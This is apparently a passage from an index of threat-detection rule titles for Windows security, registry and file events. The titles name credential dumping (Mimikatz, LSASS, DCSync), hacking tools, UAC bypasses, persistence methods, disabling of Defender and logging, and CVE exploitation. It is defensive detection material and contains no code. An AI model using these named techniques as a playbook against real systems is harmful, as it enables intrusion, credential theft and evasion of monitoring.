  • ETW Logging/Processing Option Disabled On IIS Server
  • HTTP Logging Disabled On IIS Server
  • New Module Module Added To IIS Server
  • Previously Installed IIS Module Was Removed
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP
  • Standard User In High Privileged Group
  • ProxyLogon MSExchange OabVirtualDirectory
  • Mailbox Export to Exchange Webserver
  • Certificate Request Export to Exchange Webserver
  • Remove Exported Mailbox from Exchange Webserver
  • Exchange Set OabVirtualDirectory ExternalUrl Property
  • MSExchange Transport Agent Installation - Builtin
  • Failed MSExchange Transport Agent Installation
  • NTLM Logon
  • NTLM Brute Force
  • Potential Remote Desktop Connection to Non-Domain Host
  • OpenSSH Server Listening On Socket
  • Azure AD Health Monitoring Agent Registry Keys Access
  • Azure AD Health Service Agents Registry Keys Access
  • Powerview Add-DomainObjectAcl DCSync AD Extend Right
  • AD Privileged Users or Groups Reconnaissance
  • ADCS Certificate Template Configuration Vulnerability
  • ADCS Certificate Template Configuration Vulnerability with Risky EKU
  • Add or Remove Computer from DC
  • Access To ADMIN$ Network Share
  • AD Object WriteDAC Access
  • Active Directory Replication from Non Machine Account
  • Potential AD User Enumeration From Non-Machine Account
  • Enabled User Right in AD to Control User Objects
  • Active Directory User Backdoors
  • Weak Encryption Enabled and Kerberoast
  • Hacktool Ruler
  • Remote Task Creation via ATSVC Named Pipe
  • Security Eventlog Cleared
  • Processes Accessing the Microphone and Webcam
  • Failed Code Integrity Checks
  • CobaltStrike Service Installations - Security
  • DCERPC SMB Spoolss Named Pipe
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Security
  • Mimikatz DC Sync
  • Device Installation Blocked
  • Windows Event Auditing Disabled
  • Important Windows Event Auditing Disabled
  • ETW Logging Disabled In .NET Processes - Registry
  • DPAPI Domain Backup Key Extraction
  • DPAPI Domain Master Key Backup Attempt
  • External Disk Drive Or USB Storage Device Was Recognized By The System
  • Persistence and Execution at Scale via GPO Scheduled Task
  • Hidden Local User Creation
  • HackTool - EDRSilencer Execution - Filter Added
  • HackTool - NoFilter Execution
  • HybridConnectionManager Service Installation
  • Impacket PsExec Execution
  • Possible Impacket SecretDump Remote Activity
  • Invoke-Obfuscation CLIP+ Launcher - Security
  • Invoke-Obfuscation Obfuscated IEX Invocation - Security
  • Invoke-Obfuscation STDIN+ Launcher - Security
  • Invoke-Obfuscation VAR+ Launcher - Security
  • Invoke-Obfuscation COMPRESS OBFUSCATION - Security
  • Invoke-Obfuscation RUNDLL LAUNCHER - Security
  • Invoke-Obfuscation Via Stdin - Security
  • Invoke-Obfuscation Via Use Clip - Security
  • Invoke-Obfuscation Via Use MSHTA - Security
  • Invoke-Obfuscation Via Use Rundll32 - Security
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security
  • ISO Image Mounted
  • Kerberoasting Activity - Initial Query
  • First Time Seen Remote Named Pipe
  • LSASS Access From Non System Account
  • Credential Dumping Tools Service Execution - Security
  • WCE wceaux.dll Access
  • Metasploit SMB Authentication
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Meterpreter or Cobalt Strike Getsystem Service Installation - Security
  • NetNTLM Downgrade Attack
  • Windows Network Access Suspicious desktop.ini Action
  • New or Renamed User Account with '$' Character
  • Denied Access To Remote Desktop
  • Password Policy Enumerated
  • Windows Pcap Drivers
  • Possible PetitPotam Coerce Authentication Attempt
  • PetitPotam Suspicious Kerberos TGT Request
  • Possible DC Shadow Attack
  • PowerShell Scripts Installed as Services - Security
  • Protected Storage Service Access
  • RDP over Reverse SSH Tunnel WFP
  • Register new Logon Process by Rubeus
  • Service Registry Key Read Access Request
  • Remote PowerShell Sessions Network Connections (WinRM)
  • Replay Attack Detected
  • SAM Registry Hive Handle Request
  • SCM Database Handle Failure
  • SCM Database Privileged Operation
  • Potential Secure Deletion with SDelete
  • Service Installed By Unusual Client - Security
  • Remote Access Tool Services Have Been Installed - Security
  • SMB Create Remote File Admin Share
  • A New Trust Was Created To A Domain
  • Win Susp Computer Name Containing Samtheadmin
  • Addition of SID History to Active Directory Object
  • Password Change on Directory Service Restore Mode (DSRM) Account
  • Account Tampering - Suspicious Failed Logon Reasons
  • Group Policy Abuse for Privilege Addition
  • Startup/Logon Script Added to Group Policy Object
  • Kerberos Manipulation
  • Suspicious LDAP-Attributes Used
  • Suspicious Windows ANONYMOUS LOGON Local Account Created
  • Password Dumper Activity on LSASS
  • Suspicious Remote Logon with Explicit Credentials
  • Potentially Suspicious AccessMask Requested From LSASS
  • Reconnaissance Activity
  • Password Protected ZIP File Opened
  • Password Protected ZIP File Opened (Suspicious Filenames)
  • Password Protected ZIP File Opened (Email Attachment)
  • Uncommon Outbound Kerberos Connection - Security
  • Possible Shadow Credentials Added
  • Suspicious PsExec Execution
  • Suspicious Access to Sensitive File Extensions
  • Suspicious Kerberos RC4 Ticket Encryption
  • Suspicious Scheduled Task Creation
  • Important Scheduled Task Deleted/Disabled
  • Suspicious Scheduled Task Update
  • Unauthorized System Time Modification
  • Remote Service Activity via SVCCTL Named Pipe
  • SysKey Registry Keys Access
  • Sysmon Channel Reference Deletion
  • Tap Driver Installation - Security
  • Suspicious Teams Application Related ObjectAcess Event
  • Transferring Files with Credential Data via Network Shares
  • User Added to Local Administrator Group
  • User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'
  • Local User Creation
  • Potential Privileged System Service Operation - SeLoadDriverPrivilege
  • User Logoff Event
  • VSSAudit Security Event Source Registration
  • Windows Defender Exclusion List Modified
  • Windows Defender Exclusion Deleted
  • T1047 Wmiprvse Wbemcomn DLL Hijack
  • Locked Workstation
  • WMI Persistence - Security
  • Windows Defender Exclusion Registry Key - Write Access Requested
  • Admin User Remote Logon
  • DiagTrackEoP Default Login Username
  • A Member Was Removed From a Security-Enabled Global Group
  • Potential Access Token Abuse
  • RDP Login from Localhost
  • Successful Overpass the Hash Attempt
  • Scanner PoC for CVE-2019-0708 RDP RCE Vuln
  • A Member Was Added to a Security-Enabled Global Group
  • A Security-Enabled Global Group Was Deleted
  • External Remote RDP Logon from Public IP
  • Pass the Hash Activity 2
  • External Remote SMB Logon from Public IP
  • Failed Logon From Public IP
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP
  • Outgoing Logon with New Credentials
  • RottenPotato Like Attack Pattern
  • Successful Account Login Via WMI
  • Windows Filtering Platform Blocked Connection From EDR Agent Binary
  • Microsoft Defender Blocked from Loading Unsigned DLL
  • Unsigned Binary Loaded From Suspicious Location
  • HybridConnectionManager Service Running
  • Suspicious Application Installed
  • Suspicious Rejected SMB Guest Logon From IP
  • Sysmon Application Crashed
  • NTLMv1 Logon Between Client and Server
  • Active Directory Certificate Services Denied Certificate Enrollment Request
  • DHCP Server Error Failed Loading the CallOut DLL
  • DHCP Server Loaded the CallOut DLL
  • Potential CVE-2021-42287 Exploitation Attempt
  • Local Privilege Escalation Indicator TabTip
  • Eventlog Cleared
  • Important Windows Eventlog Cleared
  • KDC RC4-HMAC Downgrade CVE-2022-37966
  • Certificate Use With No Strong Mapping
  • No Suitable Encryption Key Found For Generating Kerberos Ticket
  • Critical Hive In Suspicious Location Access Bits Cleared
  • Volume Shadow Copy Mount
  • Suspicious Usage of CVE_2021_34484 or CVE 2022_21919
  • Windows Update Error
  • Zerologon Exploitation Using Well-known Tools
  • Vulnerable Netlogon Secure Channel Connection Allowed
  • NTFS Vulnerability Exploitation
  • Windows Defender Threat Detection Service Disabled
  • CobaltStrike Service Installations - System
  • smbexec.py Service Installation
  • Invoke-Obfuscation CLIP+ Launcher - System
  • Invoke-Obfuscation Obfuscated IEX Invocation - System
  • Invoke-Obfuscation STDIN+ Launcher - System
  • Invoke-Obfuscation VAR+ Launcher - System
  • Invoke-Obfuscation COMPRESS OBFUSCATION - System
  • Invoke-Obfuscation Via Stdin - System
  • Invoke-Obfuscation RUNDLL LAUNCHER - System
  • Invoke-Obfuscation Via Use Clip - System
  • Invoke-Obfuscation Via Use MSHTA - System
  • Invoke-Obfuscation Via Use Rundll32 - System
  • Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System
  • KrbRelayUp Service Installation
  • Credential Dumping Tools Service Execution - System
  • Meterpreter or Cobalt Strike Getsystem Service Installation - System
  • Moriya Rootkit - System
  • PowerShell Scripts Installed as Services
  • Anydesk Remote Access Software Service Installation
  • CSExec Service Installation
  • HackTool Service Registration or Execution
  • Mesh Agent Service Installation
  • NetSupport Manager Service Install
  • PAExec Service Installation
  • New PDQDeploy Service - Server Side
  • New PDQDeploy Service - Client Side
  • ProcessHacker Privilege Elevation
  • RemCom Service Installation
  • Remote Access Tool Services Have Been Installed - System
  • Remote Utilities Host Service Install
  • Sliver C2 Default Service Installation
  • Service Installed By Unusual Client - System
  • Suspicious Service Installation
  • PsExec Service Installation
  • Tap Driver Installation
  • TacticalRMM Service Installation
  • Uncommon Service Installation Image Path
  • Important Windows Service Terminated With Error
  • Windows Service Terminated With Error
  • Important Windows Service Terminated Unexpectedly
  • RTCore Suspicious Service Installation
  • Service Installation in Suspicious Folder
  • Service Installation with Suspicious Folder Pattern
  • Suspicious Service Installation Script
  • Potential RDP Exploit CVE-2019-0708
  • Scheduled Task Executed From A Suspicious Location
  • Scheduled Task Executed Uncommon LOLBIN
  • Important Scheduled Task Deleted
  • Ngrok Usage with Remote Desktop Service
  • Windows Defender Grace Period Expired
  • LSASS Access Detected via Attack Surface Reduction
  • PSExec and WMI Process Creations Block
  • Windows Defender Exclusions Added
  • Windows Defender Exploit Guard Tamper
  • Windows Defender Submit Sample Feature Disabled
  • Windows Defender Malware And PUA Scanning Disabled
  • Windows Defender Malware Detection History Deletion
  • Windows Defender AMSI Trigger Detected
  • Windows Defender Real-time Protection Disabled
  • Windows Defender Real-Time Protection Failure/Restart
  • Win Defender Restored Quarantine File
  • Windows Defender Configuration Changes
  • Microsoft Defender Tamper Protection Trigger
  • Windows Defender Threat Detected
  • Windows Defender Virus Scanning Feature Disabled
  • WMI Persistence
  • Potential RemoteFXvGPUDisablement.EXE Abuse
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell
  • Suspicious Non PowerShell WSMAN COM Provider
  • Sysmon Configuration Change
  • Sysmon Blocked Executable
  • Sysmon Blocked File Shredding
  • Sysmon File Executable Creation Detected
  • Rejetto HTTP File Server RCE
  • CVE-2010-5278 Exploitation Attempt
  • CosmicDuke Service Installation
  • StoneDrill Service Install
  • Equation Group C2 Communication
  • Turla Service Install
  • Turla PNG Dropper Service
  • Fortinet CVE-2018-13379 Exploitation
  • Oracle WebLogic Exploit
  • OilRig APT Schedule Task Persistence - Security
  • OilRig APT Schedule Task Persistence - System
  • Defrag Deactivation - Security
  • Pulse Secure Attack CVE-2019-11510
  • Citrix Netscaler Attack CVE-2019-19781
  • Confluence Exploitation CVE-2019-3398
  • Chafer Malware URL Pattern
  • Ursnif Malware C2 URL Pattern
  • Ursnif Malware Download URL Pattern
  • APT40 Dropbox Tool User Agent
  • Operation Wocao Activity - Security
  • CVE-2020-0688 Exploitation Attempt
  • CVE-2020-0688 Exchange Exploitation via Web Log
  • CVE-2020-0688 Exploitation via Eventlog
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195
  • ComRAT Network Communication
  • TerraMaster TOS CVE-2020-28188
  • Cisco ASA FTD Exploit CVE-2020-3452
  • Oracle WebLogic Exploit CVE-2020-14882
  • GALLIUM Artefacts - Builtin
  • Solarwinds SUPERNOVA Webshell Access
  • Arcadyan Router Exploitations
  • Possible Exploitation of Exchange RCE CVE-2021-42321
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
  • Possible CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-1675 Print Spooler Exploitation IPC Access
  • Oracle WebLogic Exploit CVE-2021-2109
  • CVE-2021-21972 VSphere Exploitation
  • CVE-2021-21978 Exploitation Attempt
  • VMware vCenter Server File Upload CVE-2021-22005
  • Fortinet CVE-2021-22123 Exploitation
  • Pulse Connect Secure RCE Attack CVE-2021-22893
  • Potential CVE-2021-26084 Exploitation Attempt
  • Exploitation of CVE-2021-26814 in Wazuh
  • ProxyLogon Reset Virtual Directories Based On IIS Log
  • Potential CVE-2021-27905 Exploitation Attempt
  • Exchange Exploitation CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation
  • ADSelfService Exploitation
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit
  • LPE InstallerFileTakeOver PoC CVE-2021-41379
  • CVE-2021-41773 Exploitation Attempt
  • Sitecore Pre-Auth RCE CVE-2021-42237
  • Potential CVE-2021-42278 Exploitation Attempt
  • Suspicious Computer Account Name Change CVE-2021-42287
  • Grafana Path Traversal Exploitation CVE-2021-43798
  • Log4j RCE CVE-2021-44228 Generic
  • Log4j RCE CVE-2021-44228 in Fields
  • Exchange ProxyShell Pattern
  • Successful Exchange ProxyShell Attack
  • SonicWall SSL/VPN Jarrewrite Exploitation
  • Devil Bait Potential C2 Communication Traffic
  • Goofy Guineapig Backdoor Potential C2 Communication
  • Goofy Guineapig Backdoor Service Creation
  • Small Sieve Malware Potential C2 Communication
  • Exchange Exploitation Used by HAFNIUM
  • DEWMODE Webshell Access
  • Potential CVE-2022-21587 Exploitation Attempt
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE
  • CVE-2022-31659 VMware Workspace ONE Access RCE
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass
  • Apache Spark Shell Command Injection - Weblogs
  • Atlassian Bitbucket Command Injection Via Archive API
  • Potential OWASSRF Exploitation Attempt - Proxy
  • OWASSRF Exploitation Attempt Using Public POC - Proxy
  • Potential OWASSRF Exploitation Attempt - Webserver
  • OWASSRF Exploitation Attempt Using Public POC - Webserver
  • Exploitation Indicator Of CVE-2022-42475
  • Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877
  • Potential CVE-2022-46169 Exploitation Attempt
  • MSSQL Extended Stored Procedure Backdoor Maggie
  • BlueSky Ransomware Artefacts
  • MSMQ Corrupted Packet Encountered
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21
  • Exploitation Indicators Of CVE-2023-20198
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)
  • Potential CVE-2023-2283 Exploitation
  • CVE-2023-23397 Exploitation Attempt
  • Potential CVE-2023-23397 Exploitation Attempt - SMB
  • Potential CVE-2023-23752 Exploitation Attempt
  • Potential CVE-2023-25157 Exploitation Attempt
  • Potential CVE-2023-25717 Exploitation Attempt
  • Potential CVE-2023-27997 Exploitation Indicators
  • MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request
  • Potential CVE-2023-36884 Exploitation Pattern
  • Potential CVE-2303-36884 URL Request Pattern Traffic
  • Potential CVE-2023-36884 Exploitation - File Downloads
  • Potential CVE-2023-36884 Exploitation - URL Marker
  • Potential CVE-2023-36884 Exploitation - Share Access
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy
  • Potential Information Disclosure CVE-2023-43261 Exploitation - Web
  • Potential CVE-2023-46214 Exploitation Attempt
  • Exploitation Attempt Of CVE-2023-46214 Using Public POC Code
  • CVE-2023-46747 Exploitation Activity - Proxy
  • CVE-2023-46747 Exploitation Activity - Webserver
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • CVE-2023-4966 Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • COLDSTEEL Persistence Service Creation
  • SNAKE Malware Service Persistence
  • Potential Compromised 3CXDesktopApp Beaconing Activity - Proxy
  • Potential Compromised 3CXDesktopApp ICO C2 File Download
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor
  • Scheduled Tasks Names Used By SVR For GraphicalProton Backdoor - Task Scheduler
  • Diamond Sleet APT Scheduled Task Creation
  • Potential Operation Triangulation C2 Beaconing Activity - DNS
  • Potential Operation Triangulation C2 Beaconing Activity - Proxy
  • Okta 2023 Breach Indicator Of Compromise
  • Potential Peach Sandstorm APT C2 Communication Activity
  • CVE-2024-1212 Exploitation - Progress Kemp LoadMaster Unauthenticated Command Injection
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation
  • ScreenConnect User Database Modification - Security
  • Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity
  • CVE-2024-49113 Exploitation Attempt - LDAP Nightmare
  • Kapeka Backdoor Scheduled Task Creation
  • Account Created And Deleted By Non Approved Users
  • Authentication Occuring Outside Normal Business Hours
  • Privilege Role Elevation Not Occuring on SAW or PAW
  • Privilege Role Sign-In Outside Expected Controls
  • Privilege Role Sign-In Outside Of Normal Hours
  • User with Privileges Logon
  • Potential Zerologon (CVE-2020-1472) Exploitation
  • Potential Pass the Hash Activity
  • Remote Registry Management Using Reg Utility
  • Interactive Logon to Server Systems
  • Mail Forwarding/Redirecting Activity In O365
  • Okta Password Health Report Query
  • .Class Extension URI Ending Request
  • Firewall Rule Modified In The Windows Firewall Exception List
  • Access To Browser Credential Files By Uncommon Applications - Security
  • Scheduled Task Deletion
  • Potential Remote WMI ActiveScriptEventConsumers Activity
  • AWS EC2 Download Userdata
  • Potential Backup Enumeration on AWS
  • Account Enumeration on AWS
  • Potential Network Enumeration on AWS
  • Potential Storage Enumeration on AWS
  • AWS Lambda Function Created or Invoked
  • AWS Macie Evasion
  • Potential AWS Cloud Email Service Abuse
  • Sign-in Failure Bad Password Threshold
  • CVE-2021-3156 Exploitation Attempt
  • CVE-2021-3156 Exploitation Attempt Bruteforcing
  • Potential CVE-2021-4034 Exploitation Attempt
  • Use of Debugfs to Access a Raw Disk
  • OMIGOD SCX RunAsProvider ExecuteScript
  • Failed Logins with Different Accounts from Single Source - Linux
  • Privilege Escalation Preparation
  • Possible DNS Tunneling
  • High DNS Bytes Out
  • High NULL Records Requests Rate
  • High DNS Requests Rate
  • High DNS subdomain requests rate per domain
  • High TXT Records Requests Rate
  • Large domain name request
  • High DNS Bytes Out - Firewall
  • High DNS Requests Rate - Firewall
  • Network Scans Count By Destination IP
  • Possible DNS Rebinding
  • Network Scans Count By Destination Port
  • Multiple Modsecurity Blocks
  • Multiple Suspicious Resp Codes Caused by Single Client
  • Stored Credentials in Fake Files
  • Dumping ntds.dit remotely via DCSync
  • Dumping ntds.dit remotely via NetSync
  • Malicious Service Installations
  • Metasploit Or Impacket Service Installation Via SMB PsExec
  • Remote Schtasks Creation
  • Enumeration via the Global Catalog
  • Rare Schtasks Creations
  • Password Spraying via Explicit Credentials
  • Multiple Users Failing to Authenticate from Single Process
  • Failed Logins with Different Accounts from Single Source System
  • Failed NTLM Logins with Different Accounts from Single Source System
  • Valid Users Failing to Authenticate From Single Source Using Kerberos
  • Disabled Users Failing To Authenticate From Source Using Kerberos
  • Invalid Users Failing To Authenticate From Source Using Kerberos
  • Valid Users Failing to Authenticate from Single Source Using NTLM
  • Invalid Users Failing To Authenticate From Single Source Using NTLM
  • Multiple Users Remotely Failing To Authenticate From Single Source
  • Suspicious Multiple File Rename Or Delete Occurred
  • Possible Remote Password Change Through SAMR
  • Failed Mounting of Hidden Share
  • Rare Service Installations
  • Rare Scheduled Task Creations
  • Domain User Enumeration Network Recon 01
  • Potential Exfiltration of Compressed Files
windows-registry_set 215
  • Abusing Windows Telemetry For Persistence - Registry
  • User Account Hidden By Registry
  • Service Binary in Uncommon Folder
  • Disable Microsoft Office Security Features
  • Adwind RAT / JRAT - Registry
  • Office Security Settings Changed
  • Potential Persistence Via COM Hijacking From Suspicious Locations
  • Potential Persistence Via COM Search Order Hijacking
  • SilentProcessExit Monitor Registration
  • Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback
  • Registry Persistence via Service in Safe Mode
  • Add Port Monitor Persistence in Registry
  • Add Debugger Entry To AeDebug For Persistence
  • Allow RDP Remote Assistance Feature
  • Potential AMSI COM Server Hijacking
  • CurrentVersion Autorun Keys Modification
  • Common Autorun Keys Modification
  • Classes Autorun Keys Modification
  • CurrentControlSet Autorun Keys Modification
  • CurrentVersion NT Autorun Keys Modification
  • Internet Explorer Autorun Keys Modification
  • Office Autorun Keys Modification
  • Session Manager Autorun Keys Modification
  • System Scripts Autorun Keys Modification
  • WinSock2 Autorun Keys Modification
  • Wow6432Node CurrentVersion Autorun Keys Modification
  • Wow6432Node Classes Autorun Keys Modification
  • New BgInfo.EXE Custom DB Path Registry Configuration
  • Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
  • New BgInfo.EXE Custom WMI Query Registry Configuration
  • New BgInfo.EXE Custom VBScript Registry Configuration
  • Bypass UAC Using Event Viewer
  • Blackbyte Ransomware Registry
  • Bypass UAC Using DelegateExecute
  • Bypass UAC Using SilentCleanup Task
  • Default RDP Port Changed to Non Standard Port
  • IE Change Domain Zone
  • Sysmon Driver Altitude Change
  • Change Winevt Channel Access Permission Via Registry
  • Running Chrome VPN Extensions via the Registry 2 VPN Extension
  • ClickOnce Trust Prompt Tampering
  • Potential CobaltStrike Service Installations - Registry
  • COM Hijack via Sdclt
  • CrashControl CrashDump Disabled
  • Service Binary in Suspicious Folder
  • Custom File Open Handler Executes PowerShell
  • Potential Registry Persistence Attempt Via DbgManagedDebugger
  • Windows Defender Exclusions Added - Registry
  • Potentially Suspicious Desktop Background Change Via Registry
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry
  • Hypervisor Enforced Code Integrity Disabled
  • Hypervisor Enforced Paging Translation Disabled
  • DHCP Callout DLL Installation
  • Disable Exploit Guard Network Protection on Windows Defender
  • Disable Administrative Share Creation at Startup
  • Disabled Windows Defender Eventlog
  • Disable PUA Protection on Windows Defender
  • Disable Tamper Protection on Windows Defender
  • Potential AutoLogger Sessions Tampering
  • Disable Microsoft Defender Firewall via Registry
  • Disable Internal Tools or Feature in Registry
  • Disable Macro Runtime Scan Scope
  • Disable Privacy Settings Experience in Registry
  • Disable Windows Security Center Notifications
  • Registry Disable System Restore
  • Windows Defender Service Disabled - Registry
  • Disable Windows Firewall by Registry
  • Disable Windows Event Logging Via Registry
  • Add DisallowRun Execution to Registry
  • Persistence Via Disk Cleanup Handler - Autorun
  • DNS-over-HTTPS Enabled by Registry
  • New DNS ServerLevelPluginDll Installed
  • ETW Logging Disabled In .NET Processes - Sysmon Registry
  • Directory Service Restore Mode(DSRM) Registry Value Tampering
  • Periodic Backup For System Registry Hives Enabled
  • Windows Recall Feature Enabled - Registry
  • Enabling COR Profiler Environment Variables
  • Potential EventLog File Location Tampering
  • Scripted Diagnostics Turn Off Check Enabled - Registry
  • Suspicious Application Allowed Through Exploit Guard
  • Change User Account Associated with the FAX Service
  • Change the Fax Dll
  • New File Association Using Exefile
  • Add Debugger Entry To Hangs Key For Persistence
  • Persistence Via Hhctrl.ocx
  • Registry Modification to Hidden File Extension
  • Displaying Hidden Files Feature Disabled
  • Registry Hide Function from User
  • Hide Schedule Task Via Index Value Tamper
  • Driver Added To Disallowed Images In HVCI - Registry
  • IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols
  • Uncommon Extension In Keyboard Layout IME File Registry Value
  • Suspicious Path In Keyboard Layout IME File Registry Value
  • New Root or CA or AuthRoot Certificate to Store
  • Internet Explorer DisableFirstRunCustomize Enabled
  • Potential Ransomware Activity Using LegalNotice Message
  • Lolbas OneDriveStandaloneUpdater.exe Proxy Download
  • Lsass Full Dump Request Via DumpType Registry Settings
  • RestrictedAdminMode Registry Value Tampering
  • Blue Mockingbird - Registry
  • Potential Persistence Via Netsh Helper DLL - Registry
  • New Netsh Helper DLL Registered From A Suspicious Location
  • NET NGenAssemblyUsageLog Registry Key Tamper
  • New Application in AppCompat
  • Potential Credential Dumping Attempt Using New NetworkProvider - REG
  • New ODBC Driver Registered
  • Potentially Suspicious ODBC Driver Registered
  • Microsoft Office Protected View Disabled
  • Trust Access Disable For VBApplications
  • Python Function Execution Security Warning Disabled In Excel - Registry
  • Enable Microsoft Dynamic Data Exchange
  • Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting
  • Outlook Macro Execution Without Warning Setting Enabled
  • Outlook EnableUnsafeClientMailRules Setting Enabled - Registry
  • Outlook Security Settings Updated - Registry
  • Uncommon Microsoft Office Trusted Location Added
  • Macro Enabled In A Potentially Suspicious Document
  • Office Macros Warning Disabled
  • MaxMpxCt Registry Value Changed
  • Potential Persistence Using DebugPath
  • Potential Persistence Via AppCompat RegisterAppRestart Layer
  • Potential Persistence Via App Paths Default Property
  • Potential Persistence Via AutodialDLL
  • Potential Persistence Via CHM Helper DLL
  • Potential PSFactoryBuffer COM Hijacking
  • COM Object Hijacking Via Modification Of Default System CLSID Default Value
  • Potential Persistence Via Custom Protocol Handler
  • Potential Persistence Via Event Viewer Events.asp
  • Potential Persistence Via GlobalFlags
  • Modification of IE Registry Settings
  • Register New IFiltre For Persistence
  • Potential Persistence Via LSA Extensions
  • Potential Persistence Via Mpnotify
  • Potential Persistence Via Excel Add-in - Registry
  • Potential Persistence Via MyComputer Registry Keys
  • Potential Persistence Via TypedPaths
  • Potential Persistence Via Outlook Today Page
  • Potential Persistence Via Scrobj.dll COM Hijacking
  • Potential WerFault ReflectDebugger Registry Value Abuse
  • Potential Persistence Via Visual Studio Tools for Office
  • Suspicious Shim Database Patching Activity
  • PowerShell Script Execution Policy Enabled
  • Potential Attachment Manager Settings Associations Tamper
  • Potential Persistence Via Outlook Home Page
  • Potential Persistence Via DLLPathOverride
  • Potential Persistence Via Shim Database In Uncommon Location
  • Potential Attachment Manager Settings Attachments Tamper
  • PowerShell as a Service in Registry
  • Potential Persistence Via Shim Database Modification
  • Potential PowerShell Execution Policy Tampering
  • Suspicious Powershell In Registry Run Keys
  • PowerShell Logging Disabled Via Registry Key Tampering
  • Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG
  • Usage of Renamed Sysinternals Tools - RegistrySet
  • ETW Logging Disabled For rpcrt4.dll
  • Potentially Suspicious Command Executed Via Run Dialog Box - Registry
  • ScreenSaver Registry Key Set
  • Potential SentinelOne Shell Context Menu Scan Command Tampering
  • ETW Logging Disabled For SCM
  • ServiceDll Hijack
  • Registry Explorer Policy Modification
  • Persistence Via New SIP Provider
  • Tamper With Sophos AV Registry Keys
  • Hiding User Account Via SpecialAccounts Registry Key
  • Activate Suppression of Windows Security Center Notifications
  • Suspicious Environment Variable Has Been Registered
  • Suspicious Keyboard Layout Load
  • Potential PendingFileRenameOperations Tampering
  • Suspicious Printer Driver Empty Manufacturer
  • Registry Persistence via Explorer Run Key
  • New RUN Key Pointing to Suspicious Folder
  • Suspicious Service Installed
  • Modify User Shell Folders Startup Value
  • Enable LM Hash Storage
  • Scheduled TaskCache Change by Uncommon Program
  • Potential Registry Persistence Attempt Via Windows Telemetry
  • RDP Sensitive Settings Changed to Zero
  • RDP Sensitive Settings Changed
  • New TimeProviders Registered With Uncommon DLL Name
  • Old TLS1.0/TLS1.1 Protocol Version Enabled
  • COM Hijacking via TreatAs
  • Potential Signing Bypass Via Windows Developer Features - Registry
  • UAC Bypass via Event Viewer
  • UAC Bypass via Sdclt
  • UAC Bypass Abusing Winsat Path Parsing - Registry
  • UAC Bypass Using Windows Media Player - Registry
  • UAC Disabled
  • UAC Notification Disabled
  • UAC Secure Desktop Prompt Disabled
  • VBScript Payload Stored in Registry
  • Wdigest Enable UseLogonCredential
  • Execution DLL of Choice Using WAB.EXE
  • Disable Windows Defender Functionalities Via Registry Keys
  • Winget Admin Settings Modification
  • Enable Local Manifest Installation With Winget
  • Winlogon Notify Key Logon Persistence
  • Winlogon AllowMultipleTSSessions Enable
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
  • CVE-2021-31979 CVE-2021-33771 Exploits
  • Small Sieve Malware Registry Persistence
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
  • Outlook Task/Note Reminder Received
  • Potential COLDSTEEL RAT Windows User Creation
  • Potential Encrypted Registry Blob Related To SNAKE Malware
  • Potential KamiKakaBot Activity - Winlogon Shell Persistence
  • Kapeka Backdoor Autorun Persistence
  • Kapeka Backdoor Configuration Persistence
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap
  • Forest Blizzard APT - Custom Protocol Handler Creation
  • Forest Blizzard APT - Custom Protocol Handler DLL Registry Set
  • Microsoft Office Trusted Location Updated
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
  • Command Executed Via Run Dialog Box - Registry
  • Service Binary in User Controlled Folder
  • Shell Context Menu Command Tampering
windows-file_event 207
  • Suspicious File Event With Teams Objects
  • Suspicious Unattend.xml File Access
  • CrackMapExec File Creation Patterns
  • LSASS Memory Dump File Creation
  • CreateMiniDump Hacktool
  • Mimikatz MemSSP Default Log File Creation
  • Suspicious CLR Logs Creation
  • ADSI-Cache File Creation By Uncommon Tool
  • Advanced IP Scanner - File Event
  • Suspicious Binary Writes Via AnyDesk
  • Anydesk Temporary Artefact
  • Assembly DLL Creation Via AspNetCompiler
  • BloodHound Collection Files
  • EVTX Created In Uncommon Location
  • Creation Of Non-Existent System DLL
  • New Custom Shim Database Created
  • Suspicious Screensaver Binary File Creation
  • Files With System DLL Name In Unsuspected Locations
